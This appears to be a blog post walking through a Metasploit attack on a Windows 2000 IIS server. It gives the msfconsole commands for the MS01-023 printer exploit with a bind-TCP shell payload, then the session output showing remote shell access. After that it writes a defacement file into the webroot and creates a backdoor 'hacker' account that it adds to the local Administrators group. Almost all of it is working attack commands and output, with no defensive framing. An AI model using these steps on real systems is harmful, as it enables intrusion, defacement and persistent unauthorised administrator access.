Change directory to /pentest/exploits/framework3
cd /pentest/exploits/framework3
Launch MSF Console (Command Line Interface)
./msfconsole
Interact with MSF Console
Display help
msf > help
Search for a specific pattern
msf > search iis
Display information about the exploit module
msf > info windows/iis/ms01_023_printer
Select and use the exploit module
msf > use windows/iis/ms01_023_printer
Display all available payloads
msf > show payloads
Select and use a specific payload
msf > set PAYLOAD windows/shell/bind_tcp
Set the Remote Host (RHOST)
msf > set RHOST 131.107.1.101
Set the Listening port (LPORT)
msf > set LPORT 8888
Launch the exploit module
msf > exploit
[*] Started bind handler
[*] Sending stage (240 bytes) to 131.107.1.101
[*] Command shell session 1 opened (131.107.1.252:57346 -> 131.107.1.101:8888) at Tue Sep 28 12:17:55 +0800 2010
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
Test privilege level by writing a file
C:\WINNT\system32>echo HACKED BY MR.PEANUT! > c:\inetpub\wwwroot\hacked.txt
echo HACKED BY MR.PEANUT! > c:\inetpub\wwwroot\hacked.txt
Create a user account and add it as a member of Local Administrators group
C:\WINNT\system32>net user hacker password123 /add
net user hacker password123 /add
The command completed successfully.
C:\WINNT\system32>net localgroup administrators hacker /add
net localgroup administrators hacker /add
The command completed successfully.
No comments:
Post a Comment